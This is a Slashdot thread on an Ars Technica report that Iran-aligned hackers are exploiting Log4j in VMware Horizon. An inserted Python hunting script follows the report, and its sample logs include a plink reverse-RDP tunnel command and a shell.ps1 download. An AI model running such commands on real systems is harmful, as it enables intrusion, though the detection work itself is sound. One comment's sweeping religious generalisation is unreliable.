VMware Horizon Servers Are Under Active Exploit By Iranian State Hackers (arstechnica.com)
An anonymous reader quotes a report from Ars Technica: Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. Security firm SentinelOne has dubbed the group TunnelVision. The name is meant to emphasize TunnelVision's heavy reliance on tunneling tools and the unique way it deploys them. In the past, TunnelVision has exploited so-called 1-day vulnerabilities -- meaning vulnerabilities that have been recently patched -- to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group's better-known targets. [...] The SentinelOne research shows that the targeting continues and that this time the target is organizations running VMware Horizon, a desktop and app virtualization product that runs on Windows, macOS, and Linux.
Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it's installed, TunnelVision members use it to: execute reconnaissance commands; create a backdoor user and add it to the network administrators group; harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump; and download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic.
The hackers use multiple legitimate services to achieve and obscure their activities. Those services include: transfer.sh, pastebin.com, webhook.site, ufile.io, and raw.githubusercontent.com. People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.
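The two hunting leads above (unexplained egress to the listed public services, and a freshly created account that is promptly added to Administrators, followed by a tunneling tool launch) can be checked mechanically. The script below is an added example, not SentinelOne's or Ars Technica's code. The proxy-log and Windows-event line formats are assumed (a flattened "ts|EventID|key=value|..." form for events 4720, 4732 and 4688), and all sample log lines are constructed for illustration; real event fields such as MemberName usually carry a distinguished name rather than a bare username and need normalising first.

```python
import re
from typing import Dict, Iterable, List, Optional

# Public services the report says TunnelVision uses to stage tools and move data.
TUNNELVISION_SERVICES = frozenset({
    "transfer.sh", "pastebin.com", "webhook.site", "ufile.io",
    "raw.githubusercontent.com",
})
# Tunneling tools named in the report (process image basenames, lower-case).
TUNNEL_TOOLS = frozenset({"plink.exe", "ngrok.exe"})

# Constructed proxy log lines; assumed format: "ts src method url status".
PROXY_LOG = """\
2022-02-17T10:01:03Z 10.0.5.21 GET https://www.bing.com/search?q=vmware 200
2022-02-17T10:02:11Z 10.0.5.21 GET https://transfer.sh/get/AbC123/update.txt 200
2022-02-17T10:02:40Z 10.0.5.21 POST https://webhook.site/7f1d4c2a-0000-4000-8000-000000000000 200
2022-02-17T10:03:05Z 10.0.5.33 GET https://raw.githubusercontent.com/example/repo/main/shell.ps1 200
2022-02-17T10:04:00Z 10.0.5.33 GET https://notpastebin.com/x 200
"""

# Constructed Windows Security events, flattened as "ts|EventID|k=v|k=v...".
# 4720 = user account created, 4732 = member added to a local group,
# 4688 = new process created. Field names are the real event field names,
# but the flattening and the bare MemberName are assumptions of this example.
EVENT_LOG = r"""2022-02-17T10:05:12Z|4720|TargetUserName=svchelper|SubjectUserName=HORIZON$
2022-02-17T10:05:13Z|4732|MemberName=svchelper|TargetUserName=Administrators|SubjectUserName=HORIZON$
2022-02-17T10:06:00Z|4688|NewProcessName=C:\Users\Public\plink.exe|CommandLine=plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10
2022-02-17T11:00:00Z|4720|TargetUserName=jsmith|SubjectUserName=helpdesk
2022-02-17T11:00:30Z|4732|MemberName=jsmith|TargetUserName=Remote Desktop Users|SubjectUserName=helpdesk
"""

PROXY_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def url_host(url: str) -> Optional[str]:
    """Return the lower-cased host part of an absolute URL, or None."""
    m = re.match(r"^[a-zA-Z][a-zA-Z0-9+.-]*://([^/?#:]+)", url)
    return m.group(1).lower() if m else None


def is_tunnelvision_service(host: Optional[str]) -> bool:
    """Exact match or subdomain of a listed service; 'notpastebin.com' must not match."""
    if not host:
        return False
    return any(host == s or host.endswith("." + s) for s in TUNNELVISION_SERVICES)


def hunt_proxy(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Flag every proxy request whose destination is one of the listed services."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line.strip())
        if not m:
            continue
        ts, src, method, url, _status = m.groups()
        host = url_host(url)
        if is_tunnelvision_service(host):
            hits.append({"ts": ts, "src": src, "host": host, "method": method, "url": url})
    return hits


def parse_event(line: str) -> Optional[Dict[str, object]]:
    """Parse one flattened event line into a dict; None for unparsable lines."""
    parts = line.strip().split("|")
    if len(parts) < 2 or not parts[1].isdigit():
        return None
    fields: Dict[str, object] = {"ts": parts[0], "EventID": int(parts[1])}
    for kv in parts[2:]:
        key, _, value = kv.partition("=")
        fields[key] = value
    return fields


def hunt_events(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Correlate 4720 -> 4732 (new account made local admin) and flag tunneling tools in 4688."""
    findings: List[Dict[str, object]] = []
    created: Dict[str, str] = {}  # username -> timestamp of its 4720 event
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        eid = ev["EventID"]
        if eid == 4720:
            created[str(ev.get("TargetUserName", "")).lower()] = str(ev["ts"])
        elif eid == 4732 and str(ev.get("TargetUserName", "")).lower() == "administrators":
            member = str(ev.get("MemberName", "")).lower()
            if member in created:  # account was created earlier in this window
                findings.append({"type": "backdoor_admin", "user": member,
                                 "created": created[member], "elevated": ev["ts"],
                                 "by": ev.get("SubjectUserName")})
        elif eid == 4688:
            image = str(ev.get("NewProcessName", "")).replace("\\", "/").rsplit("/", 1)[-1].lower()
            if image in TUNNEL_TOOLS:
                findings.append({"type": "tunnel_tool", "image": image,
                                 "cmdline": ev.get("CommandLine", ""), "ts": ev["ts"]})
    return findings


if __name__ == "__main__":
    for hit in hunt_proxy(PROXY_LOG.splitlines()):
        print("EGRESS", hit["ts"], hit["src"], "->", hit["host"])
    for f in hunt_events(EVENT_LOG.splitlines()):
        print("HOST", f)
```

Run against the constructed data, the proxy pass flags the transfer.sh, webhook.site and raw.githubusercontent.com requests but not notpastebin.com, and the event pass reports svchelper (created and elevated one second apart by the HORIZON$ machine account) plus the plink.exe launch with a reverse RDP tunnel on its command line, while the helpdesk-created jsmith account is left alone. The suffix check matters: matching on a bare substring would fire on look-alike domains and miss nothing useful, whereas exact-or-subdomain matching keeps the alert tied to the services the report names.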
Aligned hackers? (Score:4)
Does the ransomware contain pro-Islamic Revolution text?
Are they using Iranian government IP addresses?
Are they government contractors?
What's the link?
Re:Aligned hackers? (Score:4, Interesting)
Details here (Score:5, Informative)
Monica Witt, a US counterintelligence agent, defected to Iran. The Iranian government gave her room and board in Iran. Then Iranian hackers started targeting her former co-workers.
You can probably guess who in Iran would want to attack US Navy counterintelligence capabilities, and have the technical chops to do so.
More information can be found in the indictment of Witt. Four Iranians were also indicted and additional details are in those indictments.
https://www.justice.gov/usao-d... [justice.gov]
I link to the indictment because that information has been officially unsealed by the federal court. I'm not revealing any secrets that way. :)
Re: (Score:2)
> You can probably guess who in Iran would want to attack US Navy counterintelligence capabilities,
Besides "everyone"? The US is seen as a dangerously corrupt Western power in Iran, and as the source of the sanctions that limit their nuclear proliferation and hinder other parts of their economy.
Monica Witt's defection is an interesting possibility as a trigger for recent activity, but the motives for Muslim anger with Christian nations and Jewish friendly societies date back to Mohammed.
All offline (Score:3)
too bad VMware has Linux kernel problems (Score:2)
You can have the latest Linux host or the latest VMware but not both.
Iranian State Hackers? (Score:1)
How do you know? I suspect this is just more war mongering
Any particular reason, any evidence? (Score:3)
Do you have any particular reason to think that? Do you have some evidence that Witt is in some other country, that she left Iran?
The indictments contain about 60 pages of evidence. On the other hand, you have - some idea completely out of your ass, based on nothing?
Re: (Score:2)
HISTORY.
WIKILEAKS.
SNOWDEN.
Yes, plenty of reasons to doubt US claims.
Re: (Score:2)
So, exactly which country do you think Witt is living in?
And again I'll ask for any evidence whatsoever.
You said "Snowden". That would be evidence that the US government was SPYING on international phone calls and therefore *knows* who is involved in these sorts of things.
Re: (Score:2)
Maybe hacking isn't against the law in Iran. Have you checked it?
Re: Any particular reason, any evidence? (Score:1)
Doing paperwork to support a lie doesn't make a lie true. The USA is the trouble maker and the liar.
Hackers aligned with the government of Iran? (Score:2)
Re: Hackers aligned with the government of Iran? (Score:2)
Good for them (Score:1)
I wish our government did something to fill budget holes.